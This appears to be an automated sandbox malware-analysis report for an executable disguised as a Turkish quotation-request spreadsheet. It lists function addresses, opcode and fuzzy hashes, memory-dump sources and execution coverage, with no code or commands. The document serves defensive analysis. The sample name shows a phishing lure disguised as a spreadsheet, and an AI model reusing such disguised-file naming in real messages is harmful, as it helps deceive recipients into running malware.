Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69cb36598a51078441debdf124aaca3ec9e0e61c44c77e5402f0f29e8323c2b4
Instruction ID: 7661b3055046c874181a1e1dff7dfdf049d3b5b2bf486d4f70c3030919b940aa
Opcode Fuzzy Hash: 69cb36598a51078441debdf124aaca3ec9e0e61c44c77e5402f0f29e8323c2b4
Instruction Fuzzy Hash: E0E092B1B106250B4B0CEBAFA41486AF6DBAFE8511304C17FD40DC7A74EE31980586C0

Function 07850FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5ed1e9e429c5caaefdf19caeeec67f690744940612d45c23764f3054c0477d
Instruction ID: 4be05b2c46e7bf342e75bf50cf1014a74c1b6fe79ea6230da4679575be3ec086
Opcode Fuzzy Hash: 2d5ed1e9e429c5caaefdf19caeeec67f690744940612d45c23764f3054c0477d
Instruction Fuzzy Hash: BEE0D8352072605FC7029A2CBC55FE63B55E786274B150267F810FB691CF398E448FD2

Function 07851050 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ac53c9b033127aa017bb5440f41c03f85f39fbf4ed1cb7f7f576ec07304e45
Instruction ID: 74ec11ae104bd4f53fd582a27bbf8e0db6310119d5f0dbaeafbcb245cbe535a4
Opcode Fuzzy Hash: 53ac53c9b033127aa017bb5440f41c03f85f39fbf4ed1cb7f7f576ec07304e45
Instruction Fuzzy Hash: E0E09230709385CFC3169F38D8588267BF9BF5624171484BED459CB7A2C636DC85C742

Function 0785BB78 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5b451edb94c8007756a1f42c79930f2bdd241a60c3842c769ee7d79151b8fb
Instruction ID: f8be274695abcefa8ab848b9131ba7bbae71ad53369c60af717a102e1b018844
Opcode Fuzzy Hash: 0e5b451edb94c8007756a1f42c79930f2bdd241a60c3842c769ee7d79151b8fb
Instruction Fuzzy Hash: 2DF0E5F28483C54BDB274F3C642D3F87F54AB22144F4C05AED88886497D7A54051C686

Function 07854038 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da7dea19aced87dd34b2d02eeb5efe4f5e93fc0d2edc9c6a3f3ca7067cfd2fe3
Instruction ID: 0175e8f19a7f9adbf667dc7a4e27e6e330c1ed931e35ecda61e378f012ca5f6b
Opcode Fuzzy Hash: da7dea19aced87dd34b2d02eeb5efe4f5e93fc0d2edc9c6a3f3ca7067cfd2fe3
Instruction Fuzzy Hash: F7E0ED31C106199ACB40FFA9DC044DEBBB4FE55311B00C626D558B7110F7306298CB91

Function 0785104B Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f4c3b78058412535592266bf1e7fa201a1f2da836d82c8965d6dfda73677ef
Instruction ID: 703b08d8863f4719c48586e9514b23a5bac1f97378e2eea9776dc6c55d9b6cd9
Opcode Fuzzy Hash: d4f4c3b78058412535592266bf1e7fa201a1f2da836d82c8965d6dfda73677ef
Instruction Fuzzy Hash: A0E08C70B00318CFC728AF25D40886177EDEB51316B64C07EC81A8B7A1CA32EC80CB80

Function 078541A8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71b7b4315a01a7165accde68e5ef2f8e347d6bc2e3784656c85d87454dff9f6
Instruction ID: 9a5d85e76d9eacd46caf5e15013ca6577dd09d468f13cd027506d39926f89f9c
Opcode Fuzzy Hash: c71b7b4315a01a7165accde68e5ef2f8e347d6bc2e3784656c85d87454dff9f6
Instruction Fuzzy Hash: E3E04F76D002199BCB40EFA9DC00ADFF7B8FF88311F10852ADA28E3200E7306655CBA0

Function 07851F23 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75304e29282fa48383b57e488c6937b48efea3afbe0058606b4b0d45c821f653
Instruction ID: e7c17082ccddad673d9bf5cde0c2deb4ae915a126088a0406fd2bd73c51972ac
Opcode Fuzzy Hash: 75304e29282fa48383b57e488c6937b48efea3afbe0058606b4b0d45c821f653
Instruction Fuzzy Hash: D6E06538406288DFC7029F20D8188887FB1FF17305B19C1AAE8088B262D735C948CF00

Function 07854A88 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bae9bba271e1509e6af80fe52c332c30276e466055b226560db9acdeddac3cc
Instruction ID: 4d994bd08cfd1080105eb5deb7b57e47d698e54c3a09803923276d0c0339eeea
Opcode Fuzzy Hash: 6bae9bba271e1509e6af80fe52c332c30276e466055b226560db9acdeddac3cc
Instruction Fuzzy Hash: 8BE026B22503618FC3225F79D904A527BE89F05294B0800B4E409C3253DA50D44487A1

Function 07853F0B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd977bad7e5267000e2d93f072deb763c1b0599c6154706b08afde316d9ac10
Instruction ID: ec9fd341287b82cc2f687e6fda36e845378db2a251026c9901b19f8328f1865b
Opcode Fuzzy Hash: fdd977bad7e5267000e2d93f072deb763c1b0599c6154706b08afde316d9ac10
Instruction Fuzzy Hash: BFD012717106154B4618DB6A9440866BBFAAFD4515314C2AED409CB634DA71990246C0

Function 07851F30 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a980cd8980b2c9f77f426291e5ad2b973868a88a8bbec2ed98654e4e4c90c76d
Instruction ID: 856bfbe1154297b7af76b45f066c7a5b5f1ce1eb21795168647546e2dec82baf
Opcode Fuzzy Hash: a980cd8980b2c9f77f426291e5ad2b973868a88a8bbec2ed98654e4e4c90c76d
Instruction Fuzzy Hash: 89E0653450A388CFC702AF68C9188063BB5BB56301B1580A6E4588F262CB35E809CF52

Function 07850798 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33b54e8093b6359414c36f857c073b6ed25c4cb9410ef974a079dfa225e7afbe
Instruction ID: 4984c8cc2270488ff3d409964a014faed629223b633b65f47960457dbf162e03
Opcode Fuzzy Hash: 33b54e8093b6359414c36f857c073b6ed25c4cb9410ef974a079dfa225e7afbe
Instruction Fuzzy Hash: 52E0C237E482604AD760CA30E8C679837B1BF95200F1988DBD880DB199C52E99478751

Function 0785CFB8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8870b3893b3a3adb484156f8506e7eae722431101a3d0e22c2397fc42c9a58
Instruction ID: cefe5d6bb17ff16313be2341e708f4f89f52d606cc655aa18ed928e5f732fce9
Opcode Fuzzy Hash: da8870b3893b3a3adb484156f8506e7eae722431101a3d0e22c2397fc42c9a58
Instruction Fuzzy Hash: AAE0B6B0D4421ADFD780EFB9C915A5EBBF0BF08704F1185A9D419E7311E7B496058F91

Function 07853F57 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82a4229b69649ffb528f348894c02faf64593bcb35f594ebd34b19372ee98a5
Instruction ID: accf4c0671e04617ca6c22f131b34f1da8c48166653f50db3e5b193d0399facb
Opcode Fuzzy Hash: a82a4229b69649ffb528f348894c02faf64593bcb35f594ebd34b19372ee98a5
Instruction Fuzzy Hash: 47D0A7A52043510FC706D72768100F27BA59DE515134081DBD008CB531D431060A8B91

Function 078544F8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6cf2c8d70e2eb819d128af43faa751f0827ec7803a681f8ba368dff2b081308
Instruction ID: bec1f15e55c495f3023226db556663af0f2f90721bc39d18920fcae95f3f317d
Opcode Fuzzy Hash: b6cf2c8d70e2eb819d128af43faa751f0827ec7803a681f8ba368dff2b081308
Instruction Fuzzy Hash: 29E0E27181061C9E8B80EEB9D9094AA7BE8AB15260F00C52AED4DDA100EA30D2D89B80

Function 07851E2B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b996c086b55b00903f677cc404fe755e0e6f037fd99c93b31286a5160bfb78c
Instruction ID: c4301cc542a7c9838f7690d5cf831b5c21b4041b26ff6cf8377bdd55d2213fae
Opcode Fuzzy Hash: 4b996c086b55b00903f677cc404fe755e0e6f037fd99c93b31286a5160bfb78c
Instruction Fuzzy Hash: 32D0A7321004587B8702A7988400CC6BF69AF59314308C056E9088B021C222D912C7D1

Function 0785DBF0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b74014d0e9d85acabb72df0f5c9f534518d485fb598a821c67100846a6659aa
Instruction ID: 8b63cd69d0b37544b91279d58bcd36882ddd9d08c333587c06cdd62eb630dec3
Opcode Fuzzy Hash: 6b74014d0e9d85acabb72df0f5c9f534518d485fb598a821c67100846a6659aa
Instruction Fuzzy Hash: 66E0E2B89052188FCB11CF10CA809E8BBF2AB1A301F1050D59849A7312D731AE51CF02

Function 07850D35 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc66fb49b301438ad71e7c81234c47cef1494301ace2cd3235191d1d0867a45c
Instruction ID: 6fbf5bda017a4f189cdcdac056b212863334f2f91c01ac8503d4e23cfb16f532
Opcode Fuzzy Hash: dc66fb49b301438ad71e7c81234c47cef1494301ace2cd3235191d1d0867a45c
Instruction Fuzzy Hash: 8AD0C9B189120ADEDB209F90DE19BAEBE71AB04318F200819E001B6150C7B916149B91

Function 07850D51 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a8f3db4582bd2030e8303f9ecb02d15e4c95b36636180f0993533f4f834480
Instruction ID: 0c23ea16740e85864e315b0f0904ce6347c201398c6711eb10664146fc14db0b
Opcode Fuzzy Hash: 07a8f3db4582bd2030e8303f9ecb02d15e4c95b36636180f0993533f4f834480
Instruction Fuzzy Hash: 23D0C9B089520ADEDB209F90DE19BAEBE71AB04318F200819E001B6150C7B556149B91

Function 0785BB88 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321904020c37c443f8c9693b1e3aa527ba0c152ee85262dd869a3f4298605a0f
Instruction ID: 1637abb35893ba9f90c9ed9d53c6347f88afd41c145e7c0967006093a1df8068
Opcode Fuzzy Hash: 321904020c37c443f8c9693b1e3aa527ba0c152ee85262dd869a3f4298605a0f
Instruction Fuzzy Hash: 85C02BF40413089FE6262FD8F80E3283B6CF701212F840011E84C41010DBBC00A0C6A7

Function 0785D6F9 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fda5f939b3d506f1572dc14bca101085c0bcc8ef4020856ca8978313ebec03d
Instruction ID: 6319ccb66cb669d71874a0979062ee54cf2e9d53ab9ae576c08c3b6c12b2ef0c
Opcode Fuzzy Hash: 7fda5f939b3d506f1572dc14bca101085c0bcc8ef4020856ca8978313ebec03d
Instruction Fuzzy Hash: 59D0C97101D2D1CFC7568B38C5984513FA6AE0B22931806E9C8A95F192C3219400CB12

Function 078586E4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcfcdf3761cb43790c437ea8caeb5f0be7e3fb73d14551736b985cb391999449
Instruction ID: 24aac74da561d45fe50ea72e3edcba2365293c95eb75e15bb28d50145c85927f
Opcode Fuzzy Hash: bcfcdf3761cb43790c437ea8caeb5f0be7e3fb73d14551736b985cb391999449
Instruction Fuzzy Hash: 7EB012B91A9304E7F109A2A88C44B1B9892BBF2B01F408D033A0480040CA319439DA2F

Function 078586E3 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7902699be42c8a8e46fbbb4501726517e86b22c56a189f7625a6da49081b2451
Instruction ID: f1e17605925ed1a30a107447fa6b318daa173da8e92ad69f31823c934e5b3a0c
Opcode Fuzzy Hash: 7902699be42c8a8e46fbbb4501726517e86b22c56a189f7625a6da49081b2451
Instruction Fuzzy Hash:

Non-executed Functions

Function 03050228 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f2428685888e0431623f6ca82a57a04303afbaf74cd311f822efde40280f9c
Instruction ID: 1fea679582e7faf1a28cbfcac509e685e97a41dfadce7571648bfbcfe42d1d0a
Opcode Fuzzy Hash: 44f2428685888e0431623f6ca82a57a04303afbaf74cd311f822efde40280f9c
Instruction Fuzzy Hash: 431294B25117458AD771DF25ECCC1C93BA2B781318F906709D2622B2E9DBB815EBCF48

Function 014EE1F4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294ad86b8580165fc9404dfc3a7709467f51c667a977c805e864bb1242c1dcc6
Instruction ID: b018a974ccc7d1bb895fd0633220ffaac425e20ccaae981fb1b7e1cd750795ba
Opcode Fuzzy Hash: 294ad86b8580165fc9404dfc3a7709467f51c667a977c805e864bb1242c1dcc6
Instruction Fuzzy Hash: 12A13B32E00216CFCF19DFA5C88859EBBF2FF94301B15456AE905AB265DB31E959CB80

Function 03050227 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8413bc9de34864700388511eddba27d55a2ff4e6386d969291ebaacd57c63bbe
Instruction ID: 13e1dd8ccb6e96f10e9fa1d4079075384982951ba783f3da3cfcc10456765e5f
Opcode Fuzzy Hash: 8413bc9de34864700388511eddba27d55a2ff4e6386d969291ebaacd57c63bbe
Instruction Fuzzy Hash: 13C1F8B25117468BD721DF24ECC81C97BB2BB85324F506709D2622B2D9DBB814EBCF48

Function 07857B23 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb168f822b9f14597912eae2bf83e36aa94c1b60a758399eddd9b01727a4828
Instruction ID: 9971c4d40bbe63419118b764d983930ba143e4478f718e18ceeeb8d09ee0c3d1
Opcode Fuzzy Hash: 0cb168f822b9f14597912eae2bf83e36aa94c1b60a758399eddd9b01727a4828
Instruction Fuzzy Hash: B951A6B5E05618CFDB58CFAAD840B8DFBF2BF89314F04C1A6D809AB214E7705A858F11

Analysis Process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exePID: 5724, Parent PID: 7064COMMON

Execution Graph

Execution Coverage:	16.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	42.9%
Total number of Nodes:	21
Total number of Limit Nodes:	2

Executed Functions

Function 06C39548 Relevance: 3.4, APIs: 2, Instructions: 357
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06C395E0

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5b432747c29b84c45435de8ae9af019cbb27318d7b217177effa6dc5f566be6
Instruction ID: e035ed2de5548a08d0797dced999fe9cc5742614aedf02636065b1983dc1ce51
Opcode Fuzzy Hash: f5b432747c29b84c45435de8ae9af019cbb27318d7b217177effa6dc5f566be6
Instruction Fuzzy Hash: F3F1F574D01228CFDB54DFA9C884B9DBBB2FF88304F5481A9E848AB355EB719985CF50

Function 06C3953D Relevance: 1.6, APIs: 1, Instructions: 93
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06C395E0

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2f3208d4f8f6412c02300913bf16a74e3f2d830a527db4fcb75baaa32679774
Instruction ID: a37ab3cc0278d375a7d19c47c5a81003ed5f362627af19e26d28180b8a83a755
Opcode Fuzzy Hash: f2f3208d4f8f6412c02300913bf16a74e3f2d830a527db4fcb75baaa32679774
Instruction Fuzzy Hash: 943119B1D016189BEB18CFAAD9887DDFBF2BF88314F14D16AD418A7294DB700945CF50

Function 02E59DE0 Relevance: 1.1, Instructions: 1137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf3f0cddd7b665391301f1ccdedd13c57b6649470d5d67b53192a3527ff7a37
Instruction ID: 38f23b0dd08300b85936e38082931051924edaa71f9922f075df0e786d7bafd7
Opcode Fuzzy Hash: 5cf3f0cddd7b665391301f1ccdedd13c57b6649470d5d67b53192a3527ff7a37
Instruction Fuzzy Hash: 4DA27E30A50219CFCB15CF68C584AAEBBF2BF88304F15D669E805DB366D735E945CBA0

Function 06C30B30 Relevance: .7, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009335353cc896675892d7c30ab0849217b3c0273e5847e54f1638a353e2f890
Instruction ID: a86c2b5513698b57d172811be1a2216ca7f731ea40c8a786a7173bd08fdf5a42
Opcode Fuzzy Hash: 009335353cc896675892d7c30ab0849217b3c0273e5847e54f1638a353e2f890
Instruction Fuzzy Hash: B572AD74E01229CFDBA4DF69C984BD9BBB2BB89300F1481E9D809A7351DB359E81CF50

Function 02E529EC Relevance: .5, Instructions: 529
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704e297ec71d19bb67996ee7d896eb49f994b6c31121e9650d92e61a85e141d
Instruction ID: efa1ff20009feabd66bfd77666dc3b467dbbefee489a75031c31f1d30015002d
Opcode Fuzzy Hash: 4704e297ec71d19bb67996ee7d896eb49f994b6c31121e9650d92e61a85e141d
Instruction Fuzzy Hash: 32E13772D5C6A6CBDB318B7448E63EBBFB5EF96214F254099CC81D7102EB25C906CB81

Function 02E569A0 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455af999ac1a09b6cbd02ee3808417ee6562105358ccea58208525a27308dfc7
Instruction ID: 8256977127cd3b53441a3bf717b4de34eaa92c51d1eef13c7434a881e176f936
Opcode Fuzzy Hash: 455af999ac1a09b6cbd02ee3808417ee6562105358ccea58208525a27308dfc7
Instruction Fuzzy Hash: 4A127A70A402299FDB14DF69C854BAEBBF6FF89304F64C569E8069B390DB349D41CB90

Function 02E56FC8 Relevance: .4, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5543fc48f673b864c844a245adcad494a534a4efca72f89553406d76d2bf9d9
Instruction ID: 36785e17ce2a4f51edf548b5a50d2fd90c84e819aa082b706baa0a6d8eae1468
Opcode Fuzzy Hash: b5543fc48f673b864c844a245adcad494a534a4efca72f89553406d76d2bf9d9
